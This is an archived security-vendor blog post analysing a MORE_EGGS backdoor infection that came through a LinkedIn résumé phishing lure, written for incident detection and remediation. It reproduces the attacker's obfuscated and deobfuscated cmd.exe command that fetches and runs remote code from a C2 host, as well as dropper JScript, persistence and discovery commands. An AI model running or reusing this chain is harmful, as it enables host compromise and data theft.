{
	"id": "fe21bbe5-cff1-459a-a52e-fd37d43312a4",
	"created_at": "2026-04-06T00:13:54.932817Z",
	"updated_at": "2026-04-10T13:12:59.97968Z",
	"deleted_at": null,
	"sha1_hash": "e37c923c835ff3e50c03111e63681c409ddb74c7",
	"title": "MORE_EGGS and some LinkedIn resumé spearphishing",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1084188,
	"plain_text": "MORE_EGGS and some LinkedIn resumé spearphishing\r\nBy Kyle Pellett, Andrew Jerry\r\nPublished: 2022-08-26 · Archived: 2026-04-05 16:14:31 UTC\r\nThe “Great Resignation” has recruiters working overtime scouring LinkedIn resumés for potential candidates.\r\nUnfortunately, some of these resumés are posted by bad actors taking advantage of the situation.\r\nWith a new twist on the MORE_EGGS family of malware, attackers are throwing their names in the ring by submitting\r\npoisoned resumés to job recruiters. The Expel SOC recently spotted a deployment of this technique. The victim’s\r\ncomputer was infected and the malware payload tried to exfiltrate data within a few minutes.\r\nHow we spotted our initial lead\r\nSo, to be honest, malware sometimes acts so quickly that multiple alerts sound before one of our analysts can start the triage\r\nprocess. As you’d imagine, we’re automatically suspicious when we see multiple alerts fire for the same activity. It tells us\r\nthat something strange is happening.\r\nIn this case, we received seven unique Microsoft Defender for Endpoint alerts within a few seconds for activity that clearly\r\n(for reasons explained below) resembled malicious code execution. This tipped our SOC analysts to an attack that was well\r\nunder way — action to contain the host was needed urgently.\r\nAfter this type of malware gains initial access — even if partially blocked by existing security controls — the attack can\r\nspread quickly and deploy code execution, defense evasion, and command and control techniques (in this case the answer\r\nwas D — all of the above).\r\nThis is why a detection strategy that covers all parts of the MITRE ATT\u0026CK framework is so important. In this case,\r\nDefender for Endpoint caught the use of XSL Script Processing first.\r\nCybersecurity is sometimes a battle of humans vs computers, and humans have the disadvantage with respect to time. 
A lot\r\ncan happen in one “computer second,” and tech like the Expel Workbench™ and Ruxie™ help level the field by\r\ntransforming alert data into intel our SOC analysts can quickly respond to while an attack is under way. (More on how we\r\nuse Defender’s features to our advantage here.)\r\nLet’s take a look at one of several Microsoft Defender for Endpoint alerts we received, how the Expel Workbench helped\r\nguide our analysts to find important information quickly, and how we inferred that this attack was in progress.\r\nhttps://expel.com/blog/more-eggs-and-some-linkedin-resume-spearphishing\r\nPage 1 of 9\n\nCan you spot the evil here? Here’s what we saw in the recent process activity:\r\nWe see regsvr32 attempting to execute 42981.ocx, which is similar to a technique used by malware (such as QBot\r\nand Lokibot). This is a pretty good giveaway that some malicious code has been executed; it’s written this 42981.ocx\r\nfile to disk, and has now called regsvr32 to run whatever code lies within this DLL file.\r\nThe process arguments of cmd.exe are heavily obfuscated, an indication of an attacker trying to evade detection. One\r\nthing that isn’t obfuscated is johndoe[.]com/kbvbskrvf, a likely suspect for a command and control IOC.\r\nThis alert is looking for discovery activity or “Suspicious sequence of exploration activities.” We see this in the\r\ncommand cmd /v /c nltest /trusted_domains outputting to a text file in a temporary directory, which is consistent\r\nwith identifying domains trusted by this host — quite unusual if you ask us.\r\nmsxsl.exe is a deprecated XML parsing tool with a well documented use case for executing code and bypassing\r\napplication controls — here we see it trying to run an obscurely named text file.\r\nWe also observe wmic creating the process ie4uinit.exe -basesettings. 
This is another LOLBAS (living off the land\r\nbinary, script, or library) like msxsl.exe that can easily execute code because it can execute commands from a\r\nspecially prepared ie4uinit.inf file.\r\nOkay, so a lot of bad stuff going on…and so far, not a lot of answers to how this happened. At this point, we declared an\r\nincident, notified our customer, and sent them remediation actions to contain the host and block communications with\r\njohndoe[.]com\r\n(Side note: This is not the real C2 we observed, but in the interest of protecting the anonymity of the user the attackers\r\nimpersonated, we refer to them as johndoe for this blog.)\r\nIdentifying the root cause\r\nThe next question we wanted to answer: How did this malware infection get here?\r\nWe used the customer’s EDR tool to review the timeline and walk back through the chain of events that ultimately led us to\r\nan event involving Outlook.exe.\r\nOUTLOOK.EXE opened the http link hxxps://www.linkedin[.]com/e/v2?e=-1swgqb-l437ev7b-v3\u0026lipi=urn%3Ali%3Apage%3Aemail_email_jobs_new_applicant_01%3Bgo6DX7fyT96rJM8b2IE8Fw%3D%3D\u0026t=plh\u0026ek=email_jobs_new_applicant_01\u0026li=0\u0026m=em\r\nHMeqGo9oXk\r\nThe user clicked on a link in an email from a legitimate sender to a legitimate domain; based on the requested resource, it\r\nappears they were seeking a resumé for a job posting. This is interesting for a couple of reasons.\r\nThe attackers evaded inbox malspam detection using a legitimate email sender\r\nThe document is likely expected, based on a job posting created by the targeted user\r\nThe link in the email also appears legitimate\r\nUnfortunately, our target still fell prey to a malicious phishing document. So what happens if the victim clicks through to\r\ndownload the resumé from LinkedIn?\r\nTo find out, we followed the trail and discovered a PDF crafted to present the viewer with an error. 
The error is actually an\r\nattempt to lure the victim to an unsafe site where they can download General-Manager-resumé.docx (the file is presented as\r\na Word document).\r\nOf course, this is suspicious to us because we know what happens. But an everyday user recruiting from LinkedIn has\r\nprobably seen resumés that aren’t compatible with their software. This seems to be what the attackers are counting on.\r\nNotably, the domain johndoe[.]com aligns with what the recruiter expects to see based on the applicant’s name. (It was later\r\ndiscovered that the victim was in fact a recruiter and wasn’t aware of a problem with their host after following this funnel.)\r\nWhat happened to the host?\r\nSo what happens when the user clicks on the .docx link? Well, as it turns out, a bunch of things (before the user is finally\r\npresented with a Word document). First of all, the file that lands on the victim’s disk is actually a zip archive by the same\r\nname, General Manager Resume 1.zip. Once the zip is written to disk, we immediately see it create John Doe CV.lnk.\r\nAt this point we see a familiar code execution from one of our alerts:\r\nObfuscated\r\n\"cmd.exe\" /v /c set \"979113wEX=set\" \u0026\u0026 call set \"979113gn=%979113wEX:~0,1%\" \u0026\u0026 (for %p in (c) do @set\r\n\"979113QCH=%~p\") \u0026\u0026 !979113gn!et \"979113XI=e\" \u0026\u0026 !979113gn!!979113XI!t \"979113rKw=$w\" \u0026\u0026 s!979113XI!t\r\n\"979113bCj=i\" \u0026\u0026 set \"979113FL=a\" \u0026\u0026 s!979113XI!t \"979113jnI=t\" \u0026\u0026 !979113gn!et \"979113pHq=d\" \u0026\u0026 s!979113XI!t\r\n\"979113mJ=.\" \u0026\u0026 s!979113XI!t \"979113MAn=init\" \u0026\u0026 set \"979113TQ=s!979113bCj!\" \u0026\u0026 s!979113XI!t\r\n\"979113Jq=s!979113XI!tt!979113bCj!ngs\" \u0026\u0026 s!979113XI!t \"979113Pnd=.!979113bCj!nf\" \u0026\u0026 set\r\n\"979113PN=i!979113XI!u!979113MAn!!979113Pnd!\" \u0026\u0026 
s!979113XI!t \"979113ED= = \" \u0026\u0026 !979113gn!et\r\n\"979113AS=s!979113bCj!gnatur!979113XI!!979113ED!\" \u0026\u0026 s!979113XI!t \"979113vY=all!979113mJ!win\" \u0026\u0026 set\r\n\"979113ixY=de\" \u0026\u0026 s!979113XI!t \"979113Dtp=ch\" \u0026\u0026 call !979113gn!!979113XI!t\r\n\"979113YM=C:Users\u003cRedacted\u003eAppDataRoamingM!979113bCj!crosoft\" \u0026\u0026 s!979113XI!t \"979113nT=!979113YM!!979113PN!\"\r\n\u0026\u0026 set \"979113of=\"^\" \u0026\u0026 (for %h in (\"[vers!979113bCj!on]\" \"!979113AS!!979113rKw!!979113bCj!ndows nt$\" \"\r\n[!979113ixY!stinationdirs]\" \"F00BE!979113ED!01\" \"[!979113ixY!faultinst!979113vY!dows7]\"\r\n\"UnRegist!979113XI!rOCXs!979113ED!3DF1\" \"!979113pHq!elfiles!979113XI!F00BE\" \"[3DF1]\"\r\n\"%11%scRo%979113yd%j,NI,%979113RHZ%%979113BCS%%979113BCS%p%979113zL%%979113rf%%979113rf%johndoe.com/kbvbskrvf\"\r\n\"[F00BE]\" \"ieu%979113GjL%!979113Pnd!\" \"[strings]\" \"979113GjL=!979113MAn!\" \"979113BCS=t\" \"servicename' '\"\r\n\"979113RHZ=h\" \"979113zL=:\" \"979113rf=/\" \"shorthvcname= \" \"979113FPK=com\" \"979113yd=b\") do @e!979113Dtp!o\r\n%~h)\u003e\"!979113nT!\" \u0026\u0026 set \"979113jgm=ie4uinit.exe\" \u0026\u0026 call copy /Y C:windowssystem32!979113jgm! \"!979113YM!\" \u003e\r\nnul \u0026\u0026 st!979113FL!rt \"\" /MIN wm!979113bCj!c proc!979113XI!ss call cr!979113XI!ate \"!979113YM!!979113jgm! 
-\r\nbas!979113XI!!979113Jq!\"\r\nDeobfuscated\r\n\"cmd.exe\" /v /c (for h in (\"[version]\" \"signature = $windows nt$\" \"[destinationdirs]\" \" 01 = 01\" \"\r\n[defaultinstall.windows7]\" \"UnRegisterOCXs = 3DF1\" \"delfileseF00BE\" \"[3DF1]\"\r\n\"11scRobj,NI,http://johndoe.com/kbvbskrvf\" \"[F00BE]\" \"ieuinit.inf\" \"[strings]\" \"init=init\" \"t=t\" \"servicename'\r\n'\" \"h=h\" \":=:\" \"/=/\" \"shorthvcname= \" \"979113FPK=com\" \"b=b\") do @echo\r\n~h)\u003e\"C:Users\u003cRedacted\u003eAppDataRoamingMicrosoft.infieuinit.inf\" \u0026\u0026 set \"ie4uinit.exe=ie4uinit.exe\" \u0026\u0026 call copy\r\n/Y C:windowssystem32ie4uinit.exe \"C:Users\u003cRedacted\u003eAppDataRoamingMicrosoft\" \u003e nul \u0026\u0026 stirt \"\" /MIN wmic process\r\ncall create \"C:Users\u003cRedacted\u003eAppDataRoamingMicrosoftie4uinit.exe -basesettings\"\r\nThis command accomplishes a few things. It:\r\npoints to http://johndoe[.]com/kbvbskrvf, a malicious resource hosted on the C2 domain, and uses the UnRegisterOCXs directive to fetch\r\nand run that resource using scrobj\r\nwrites it as the file “ieuinit.inf” and puts it in C:Users\u003cRedacted\u003eAppDataRoamingMicrosoft.infieuinit.inf\r\ncopies the legitimate ie4uinit.exe from C:windowssystem32ie4uinit.exe and uses WMIC to create the process in\r\nC:Users\u003cRedacted\u003eAppDataRoamingMicrosoftie4uinit.exe\r\nThis is indicative of the fileless malware execution technique used by GandCrab, described here. (Further credit to the\r\nBOHOPS description of misuse of .inf files, UnRegisterOCXSection and scrobj.dll.)\r\nEven though ie4uinit.exe is a legitimate Windows binary whose hash no vendor has flagged as malicious,\r\nits occurrence outside the normal/expected path raises suspicions. 
According to VirusTotal, the file isn’t signed, but\r\nappears to be copyrighted by Microsoft and is a component of Internet Explorer.\r\nWithin a millisecond of execution of the obfuscated cmd.exe process, we see the following wmic process.\r\nwmic process call create \"C:Users\u003cRedacted\u003eAppDataRoamingMicrosoftie4uinit.exe -basesettings\"\r\nAnother signed binary, msxsl.exe, is also placed in the AppdataRoaming directory. The attackers now have two signed\r\nbinaries at their disposal in an unprotected location: C:Users\u003cRedacted\u003eAppDataRoamingMicrosoftmsxsl.exe.\r\nBoth ie4uinit.exe and msxsl.exe were placed in AppdataRoaming for later use. All of this happened in seconds (while the\r\nvictim was waiting for the resumé to load), and we see one more command before the victim is presented with a Word doc\r\n(the decoy resumé).\r\nThe signed binary is in an unusual location, C:Users\u003cRedacted\u003eAppDataRoamingMicrosoftie4uinit.exe, and is using\r\nwmic to adjust token privileges to allow the following privileges to the user’s access token:\r\nShutdown, Undock, IncreaseWorkingSet, TimeZone.\r\nThis was followed by the execution of a script by ie4uinit.exe out of AppDataRoaming. The following AMSI content was\r\nrecorded.\r\nSee Appendix A:\r\nAt first glance, this looks like obfuscated JavaScript with function calls containing the following human-readable\r\noperations:\r\nreturn String.fromCharCode\r\nreturn new ActiveXObject\r\nreturn Math.floor(Math.random() * 65536\r\n.writeText\r\n.saveToFile\r\n{if (typeof WScript === ‘object’) {return true;\r\nRegRead\r\nGetObject\r\n.Create\r\nWithout completely deobfuscating this, we can guess the intent is to run a function after obfuscating the data with\r\nString.fromCharCode. This works by encoding the data as hexadecimal Unicode code point values, which are finally converted to\r\ncharacters. 
Here’s the slightly deobfuscated pretty version:\r\nSee Appendix B:\r\nThe script then takes the string and writes an ActiveXObject with what’s expected to be a WScript file:\r\nlgnsyjcm9801.saveToFile(lgnsyjcm4315);\r\nlgnsyjcm9801.close();\r\nlgnsyjcm963 = 1;\r\n} catch (lgnsyjcm265) {\r\nreturn 0;\r\n}\r\nreturn lgnsyjcm963;\r\n}\r\nfunction lgnsyjcm400() {\r\ntry {\r\nlgnsyjcm0147.lgnsyjcm786;\r\nreturn true;\r\n} catch (lgnsyjcm27) {\r\nif (typeof WScript === \"object\") {\r\nWe then see an attempt at some cryptographic function based on the presence of return Math.floor(Math.random() *\r\n65536. Open-source intelligence suggests this function is generating a pseudo-random number either used for C2 traffic\r\nencryption or as a GUID to uniquely identify the machine for eventual extortion or ransomware reasons.\r\nThere’s also evidence of an intended registry-read event:\r\nfunction lgnsyjcm206() {\r\nvar lgnsyjcm681;\r\nvar lgnsyjcm4718;\r\ntry {\r\nlgnsyjcm681 = lgnsyjcm15(lgnsyjcm2656(\"EdT:2)?+6**kP\u003eYj\", lgnsyjcm8, lgnsyjcm4));\r\nlgnsyjcm4718 = lgnsyjcm681.RegRead(lgnsyjcm2656(\"rz%I07urKoW0mJVbfPQ=}Kp;]cNjAFcRVlW#ckgw7%I\u003e\r\n(,I5,dv\u0026KR/,^kH+9*p=/6*dFQ+mC2T|j[,;T)+FE\", lgnsyjcm8, lgnsyjcm4));\r\nif (!lgnsyjcm4718) {\r\nreturn false;\r\n}\r\nThis can be deobfuscated further, but the next event we see on the host is the decoy document being created and executed\r\nusing WMI:\r\nScript content: IWshShell3.Environment(\"PROCESS\");\r\nIWshEnvironment.Item(\"APPDATA\");\r\n_Stream.Open();\r\n_Stream.Position(\"0\");\r\n_Stream.Type(\"2\");\r\n_Stream.Charset(\"437\");\r\n_Stream.WriteText(\"╨╧αí▒ß\");\r\n_Stream.SaveToFile(\"C:Users\u003cRedacted\u003eAppDataRoamingMicrosoft6222.doc\");\r\nThe user is now presented with a Word document, and nothing appears unusual. 
Thanks to AMSI content, we can see the\r\n6222.doc file was executed and an .ocx file is created.\r\nScript Content: IWshShell3.Environment(\"PROCESS\");\r\nIWshEnvironment.Item(\"APPDATA\");\r\n_Stream.Open();\r\n_Stream.Position(\"0\");\r\n_Stream.Type(\"2\");\r\n_Stream.Charset(\"437\");\r\n_Stream.WriteText(\"╨╧αí▒ß\");\r\n_Stream.SaveToFile(\"C:Users\u003cRedacted\u003eAppDataRoamingMicrosoft6222.doc\");\r\n_Stream.Close();\r\nIWshShell3.RegRead(\"HKLMSOFTWAREMicrosoftWindowsCurrentVersionApp PathsWinword.exe\");\r\nISWbemServicesEx.Get(\"Win32_Process\");\r\nISWbemObjectEx._01000001(\"C:Program FilesMicrosoft OfficeRootOffice16WIN\", \"Unsupported parameter type\r\n00000001\", \"Unsupported parameter type 00000001\", \"0\");\r\n_Stream.Open();\r\n_Stream.Position(\"0\");\r\n_Stream.Type(\"2\");\r\n_Stream.Charset(\"437\");\r\n_Stream.WriteText(\"MZÉ\");\r\n_Stream.SaveToFile(\"C:Users\u003cRedacted\u003eAppDataRoamingMicrosoft42981.ocx\")\r\n42981.ocx is now executed by regsvr32.exe, a common tactic used by malicious Word document authors.\r\nScript Content: Win32_Process.GetObject();\r\nSetPropValue.CommandLine(\"C:Program FilesMicrosoft OfficeRootOffice16WINWORD.EXE\r\n\"C:Users\u003cRedacted\u003eAppDataRoamingMicrosoft6222.doc\"\");\r\nSetPropValue.CurrentDirectory(\"Unsupported parameter type 00000001\");\r\nSetPropValue.ProcessStartupInformation(\"Unsupported parameter type 00000001\");\r\nWin32_Process.ExecMethod(Create);\r\nWin32_Process.GetObject();\r\nSetPropValue.CommandLine(\"regsvr32 /s /n /i:Login \"C:Users\u003cRedacted\u003eAppDataRoamingMicrosoft42981.ocx\"\");\r\nAfter executing the .ocx file with regsvr32 we see a registry modification that points to a text file in the AppData\r\ndirectory. 
While we don’t have the contents of the text file, we can assume this is a persistence mechanism.\r\n\"Registry Key: S-1-12-1-3569878806-1151277312-3324287152-3804517278Environment\r\nValue Name: UserInitMprLogonScript\r\nValue Data: cscripT -e:jsCript \"\"%APPDATA%Microsoft46BA2C64FFD9F546.txt\"\"\r\nValue Type: RegistryValueEntity\"\r\nRegsvr32 also launches the msxsl.exe dropped by the malware to execute the file FC22A0E0F890CC.txt.\r\n\"Script Content: Win32_Process.GetObject();\r\nSetPropValue.CommandLine(\"\"C:Users\u003cRedacted\u003eAppDataRoamingMicrosoftmsxsl.exe FC22A0E0F890CC.txt\r\nFC22A0E0F890CC.txt\"\");\r\nAfter this we see evidence of discovery commands being executed via wmi by the parent process msxsl.exe. Without the\r\ncontents of the .txt file we can’t really know for sure what’s happening. But based on OSINT, we can speculate that the .txt\r\nfile is the MORE_EGGS JScript because it behaves like MORE_EGGS.\r\nIf you’re wondering why we didn’t do further analysis … good question. We were hindered a bit without file acquisition and\r\nwere limited to host timelines. MSDFE did a pretty good job of recording.\r\nmsxsl.exe executed the WMI query 'SELECT Version FROM CIM_Datafile Where Name = 'C:\\windows\\notepad.exe''\r\nmsxsl.exe executed the WMI query 'SELECT IPAddress FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled =\r\nTrue'\r\nmsxsl.exe executed the WMI query 'SELECT * FROM Win32_Process'\r\ntypeperf.exe \"SystemProcessor Queue Length\" -si 180 -sc 1\r\nFollowing some system discovery activity, we see HTTP POSTs to the C2 domain webdirectoryuk[.]com. See Appendix C.\r\nThe wmi process then executes the cmd.exe command under the victim’s user context to run the nltest command to identify\r\ntrusted domains and write the output to a text file. 
This was the final action performed by the malware prior to host\r\ncontainment.\r\ncmd /v /c nltest /trusted_domains \u003e \"C:Users\u003cRedacted\u003eAppDataLocalTemp55337.txt\" 2\u003e\u00261\r\nBased on open source intelligence research, we suspect 55337.txt is the MORE_EGGS backdoor. This blog explains the\r\ncapability of this backdoor, which includes command execution “via cmd.exe /C” among other functionality:\r\nCommand Description\r\nd\u0026exec Download and execute an executable (.exe or .dll).\r\nmore_eggs Delete the current More_eggs and replace it.\r\nGtfo Uninstall activity.\r\nmore_onion Execute a script.\r\nvia_c Run a command using “cmd.exe /C”.\r\nUnfortunately, we were unable to acquire any of the files we described. However, given the behaviors performed on the host\r\nwe were able to tell the story of how a LinkedIn resumé phishing document resulted in a MORE_EGGS backdoor.\r\nEven without acquiring the file, our analysis of the activity aligns with the financially motivated cybercrime gangs FIN6,\r\nEvilnum, or the Cobalt Group. It’s difficult to attribute activity to a specific group, but we saw LinkedIn used in 2021 to\r\ndeliver MORE_EGGS, with one key difference. The first iteration of threat groups harnessing LinkedIn for this purpose\r\nwas an inverse of the victim-attacker relationship. Instead of recruiters expecting resumés, the FIN6 group was posing as\r\nemployers and sending fake job offers to their victims over LinkedIn. Based on their prior use of LinkedIn, it’s quite\r\npossible this is the work of FIN6 or a copycat.\r\nEither way, credit should be given where due. 
Financially motivated threat actors aren’t playing around, and the victim user\r\nat the center of this article wasn’t aware that downloading a resumé from LinkedIn left a backdoor on their machine.\r\nSummary of attack lifecycle:\r\nRemediation: Initial remediation focused on stopping the bleeding, containing the host, and reimaging the box to a known\r\ngood image, ensuring no remnants were left over. We also recommended blocking the C2 domain webdirectoryuk[.]com.\r\nResilience: Even though we detected and reported this incident quickly, the bottom line is that malicious code executed on\r\none of our customer-managed devices on their network. Whenever we can directly point to environment controls to enable\r\ndefenders or disrupt attackers, we include them in the incident findings report. In this incident we provided the customer\r\nwith the following resilience actions:\r\nDisrupt attackers:\r\nPhishing education for users, specifically from trusted sources (LinkedIn).\r\nConfigure JScript (.js, .jse), Windows Script Files (.wsf, .wsh) and HTML Application (.hta) files to open with\r\nNotepad.\r\nBy associating these file extensions with Notepad you mitigate common remote code execution techniques.\r\nNote that PowerShell files (.ps1) already open by default in Notepad.\r\nEnable Defenders:\r\nIncrease visibility into PowerShell activity by taking advantage of logging capabilities. 
Module and ScriptBlock\r\nlogging provide greater visibility into potential PowerShell attacks.\r\nGood: Ensure PowerShell 3.0 (at least) is installed on all Windows systems and enable PowerShell Module\r\nlogging.\r\nBetter: Ensure PowerShell 5.0 (at least) is installed on all Windows systems and enable PowerShell\r\nScriptBlock logging and transcription logging.\r\nBest: Ensure PowerShell 5.0 (at least) is installed on all Windows systems, enable PowerShell ScriptBlock\r\nlogging and transcription logging; also make sure Microsoft-Windows-PowerShell%4Operational.evtx is at\r\nleast 1 GB in size on all systems to aid in an investigation.\r\nAppendix A\r\nScript content: function anonymous() { function lgnsyjcm9469(lgnsyjcm2900) {return\r\nlgnsyjcm2900.length;}function lgnsyjcm262(lgnsyjcm6080){return String.fromCharCode(lgnsyjcm6080);}function\r\nlgnsyjcm56(lgnsyjcm458) {var lgnsyjcm62 = [];var lgnsyjcm356 = [];var lgnsyjcm144 = \"\";var lgnsyjcm1495;var\r\nlgnsyjcm020;var lgnsyjcm4110 = 0;lgnsyjcm62[0x80] = 0x00C7;lgnsyjcm62[0x81] = 0x00FC;lgnsyjcm62[0x82] =\r\n0x00E9;lgnsyjcm62[0x83] = 0x00E2;lgnsyjcm62[0x84] = 0x00E4;lgnsyjcm62[0x85] = 0x00E0;lgnsyjcm62[0x86] =\r\n0x00E5;lgnsyjcm62[0x87] = 0x00E7;lgnsyjcm62[0x88] = 0x00EA;lgnsyjcm62[0x89] = 0x00EB;lgnsyjcm62[0x8A] =\r\n0x00E8;lgnsyjcm62[0x8B] = 0x00EF;lgnsyjcm62[0x8C] = 0x00EE;lgnsyjcm62[0x8D] = 0x00EC;lgnsyjcm62[0x8E] =\r\n0x00C4;lgnsyjcm62[0x8F] = 0x00C5;lgnsyjcm62[0x90] = 0x00C9;lgnsyjcm62[0x91] = 0x00E6;lgnsyjcm62[0x92] =\r\n0x00C6;lgnsyjcm62[0x93] = 0x00F4;lgnsyjcm62[0x94] = 0x00F6;lgnsyjcm62[0x95] = 0x00F2;lgnsyjcm62[0x96] =\r\n0x00FB;lgnsyjcm62[0x97] = 0x00F9;lgnsyjcm62[0x98] = 0x00FF;lgnsyjcm62[0x99] = 0x00D6;lgnsyjcm62[0x9A] =\r\n0x00DC;lgnsyjcm62[0x9B] = 0x00A2;lgnsyjcm62[0x9C] = 0x00A3;lgnsyjcm62[0x9D] = 0x00A5;lgnsyjcm62[0x9E] =\r\n0x20A7;lgnsyjcm62[0x9F] = 0x0192;lgnsyjcm62[0xA0] = 0x00E1;lgnsyjcm62[0xA1] = 0x00ED;lgnsyjcm62[0xA2] =\r\n0x00F3;lgnsyjcm62[0xA3] = 0x00FA;lgnsyjcm62[0xA4] = 
0x00F1;lgnsyjcm62[0xA5] = 0x00D1;lgnsyjcm62[0xA6] =\r\n0x00AA;lgnsyjcm62[0xA7] = 0x00BA;lgnsyjcm62[0xA8] = 0x00BF;lgnsyjcm62[0xA9] = 0x2310;lgnsyjcm62[0xAA] =\r\n0x00AC;lgnsyjcm62[0xAB] = 0x00BD;lgnsyjcm62[0xAC] = 0x00BC;lgnsyjcm62[0xAD] = 0x00A1;lgnsyjcm62[0xAE] =\r\n0x00AB;lgnsyjcm62[0xAF] = 0x00BB;lgnsyjcm62[0xB0] = 0x2591;lgnsyjcm62[0xB1] = 0x2592;lgnsyjcm62[0xB2] =\r\n0x2593;lgnsyjcm62[0xB3] = 0x2502;lgnsyjcm62[0xB4] = 0x2524;lgnsyjcm62[0xB5] = 0x2561;lgnsyjcm62[0xB6] =\r\n0x2562;lgnsyjcm62[0xB7] = 0x2556;lgnsyjcm62[0xB8] = 0x2555;lgnsyjcm62[0xB9] = 0x2563;lgnsyjcm62[0xBA] =\r\n0x2551;lgnsyjcm62[0xBB] = 0x2557;lgnsyjcm62[0xBC] = 0x255D;lgnsyjcm62[0xBD] = 0x255C;lgnsyjcm62[0xBE] =\r\n0x255B;lgnsyjcm62[0xBF] = 0x2510;lgnsyjcm62[0xC0] = 0x2514;lgnsyjcm62[0xC1] = 0x2534;lgnsyjcm62[0xC2] =\r\n0x252C;lgnsyjcm62[0xC3] = 0x251C;lgnsyjcm62[0xC4] = 0x2500;lgnsyjcm62[0xC5] = 0x253C;lgnsyjcm62[0xC6] =\r\n0x255E;lgnsyjcm62[0xC7] = 0x255F;lgnsyjcm62[0xC8] = 0x255A;lgnsyjcm62[0xC9] = 0x2554;lgnsyjcm62[0xCA] =\r\n0x2569;lgnsyjcm62[0xCB] = 0x2566;lgnsyjcm62[0xCC] = 0x2560;lgnsyjcm62[0xCD] = 0x2550;lgnsyjcm62[0xCE] =\r\n0x256C;lgnsyjcm62[0xCF] = 0x2567;lgnsyjcm62[0xD0] = 0x2568;lgnsyjcm62[0xD1] = 0x2564;lgnsyjcm62[0xD2] =\r\n0x2565;lgnsyjcm62[0xD3] = 0x2559;lgnsyjcm62[0xD4] = 0x2558;lgnsyjcm62[0xD5] = 0x2552;lgnsyjcm62[0xD6] =\r\n0x2553;lgnsyjcm62[0xD7] = 0x256B;lgnsyjcm62[0xD8] = 0x256A;lgnsyjcm62[0xD9] = 0x2518;lgnsyjcm62[0xDA] =\r\n0x250C;lgnsyjcm62[0xDB] = 0x2588;lgnsyjcm62[0xDC] = 0x2584;lgnsyjcm62[0xDD] = 0x258C;lgnsyjcm62[0xDE] =\r\n0x2590;lgnsyjcm62[0xDF] = 0x2580;lgnsyjcm62[0xE0] = 0x03B1;lgnsyjcm62[0xE1] = 0x00DF;lgnsyjcm62[0xE2] =\r\n0x0393;lgnsyjcm62[0xE3] = 0x03C0;lgnsyjcm62[0xE4] = 0x03A3;lgnsyjcm62[0xE5] = 0x03C3;lgnsyjcm62[0xE6] =\r\n0x00B5;lgnsyjcm62[0xE7] = 0x03C4;lgnsyjcm62[0xE8] = 0x03A6;lgnsyjcm62[0xE9] = 0x0398;lgnsyjcm62[0xEA] =\r\n0x03A9;lgnsyjcm62[0xEB] = 0x03B4;lgnsyjcm62[0xEC] = 0x221E;lgnsyjcm62[0xED] = 0x03C6;lgnsyjcm62[0xEE] 
=\r\n0x03B5;lgnsyjcm62[0xEF] = 0x2229;lgnsyjcm62[0xF0] = 0x2261;lgnsyjcm62[0xF1] = 0x00B1;lgnsyjcm62[0xF2] =\r\n0x2265;lgnsyjcm62[0xF3] = 0x2264;lgnsyjcm62[0xF4] = 0x2320;lgnsyjcm62[0xF5] = 0x2321;lgnsyjcm62[0xF6] =\r\n0x00F7;lgnsyjcm62[0xF7] = 0x2248;lgnsyjcm62[0xF8] = 0x00B0;lgnsyjcm62[0xF9] = 0x2219;lgnsyjcm62[0xFA] =\r\n0x00B7;lgnsyjcm62[0xFB] = 0x221A;lgnsyjcm62[0xFC] = 0x207F;lgnsyjcm62[0xFD] = 0x00B2;lgnsyjcm62[0xFE] =\r\n0x25A0;lgnsyjcm62[0xFF] = 0x00A0;do {lgnsyjcm1495 = lgnsyjcm458[lgnsyjcm4110];if (lgnsyjcm1495 \u003c 128)\r\n{lgnsyjcm020 = lgnsyjcm1495;}else {lgnsyjcm020 =\r\nlgnsyjcm62[lgnsyjcm1495];}lgnsyjcm356.push(lgnsyjcm262(lgnsyjcm020));lgnsyjcm4110 += 1;} while (lgnsyjcm4110 \u003c\r\nlgnsyjcm9469(lgnsyjcm458));lgnsyjcm144 = lgnsyjcm356.join(\"\");return lgnsyjcm144;}function\r\nlgnsyjcm15(lgnsyjcm287) {return new ActiveXObject(lgnsyjcm287);}function lgnsyjcm7522() {return\r\nMath.floor(Math.random() * 65536);}function lgnsyjcm4677(lgnsyjcm387, lgnsyjcm4315, lgnsyjcm7403, lgnsyjcm1632,\r\nlgnsyjcm4299){var lgnsyjcm963;try {var lgnsyjcm5310 = lgnsyjcm598(lgnsyjcm387);var lgnsyjcm081 =\r\nlgnsyjcm894(lgnsyjcm5310, lgnsyjcm7403, lgnsyjcm1632);lgnsyjcm5310 = 0;if (lgnsyjcm4299 === 1 \u0026\u0026 lgnsyjcm081[0]\r\n!== 0x4D \u0026\u0026 lgnsyjcm081[1] !== 0x5a){return 0;}var lgnsyjcm9801 = lgnsyjcm15(lgnsyjcm2656(lgnsyjcm28,\r\nlgnsyjcm8, lgnsyjcm4));lgnsyjcm9801.open();lgnsyjcm9801.position = 0;lgnsyjcm9801.type = 2;lgnsyjcm9801.charset\r\n= 437;lgnsyjcm9801.writeText(lgnsyjcm56(lgnsyjcm081));lgnsyjcm081 =\r\n0;lgnsyjcm9801.saveToFile(lgnsyjcm4315);lgnsyjcm9801.close();lgnsyjcm963 = 1;} catch (lgnsyjcm265) {return\r\n0;}return lgnsyjcm963;}function lgnsyjcm400() {try {lgnsyjcm0147.lgnsyjcm786;return true;} catch(lgnsyjcm27)\r\n{if (typeof WScript === 'object') {return true;}lgnsyjcm481();}}function lgnsyjcm206(){var lgnsyjcm681;var\r\nlgnsyjcm4718;try{lgnsyjcm681 = lgnsyjcm15(lgnsyjcm2656('EdT:2)?+6**kP\u003eYj', lgnsyjcm8, 
lgnsyjcm4));lgnsyjcm4718\r\n= lgnsyjcm681.RegRead(lgnsyjcm2656('rz%I07urKoW0mJVbfPQ=}Kp;]cNjAFcRVlW#ckgw7%I\u003e\r\n(,I5,dv\u0026KR/,^kH+9*p=/6*dFQ+mC2T|j[,;T)+FE', lgnsyjcm8, lgnsyjcm4));if (!lgnsyjcm4718) {return false;}return\r\nlgnsyjcm4718;} catch(lgnsyjcm0598){return false;}}function lgnsyjcm481(){var lgnsyjcm9032 = \"\\;var\r\nlgnsyjcm4797;var lgnsyjcm867;var lgnsyjcm337 = \"\"\"\";var lgnsyjcm118 = '\"\"';var lgnsyjcm449 = \"\"\"\";try\r\n{lgnsyjcm4797 = lgnsyjcm15(lgnsyjcm2656(lgnsyjcm737\r\nSource: https://expel.com/blog/more-eggs-and-some-linkedin-resume-spearphishing",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
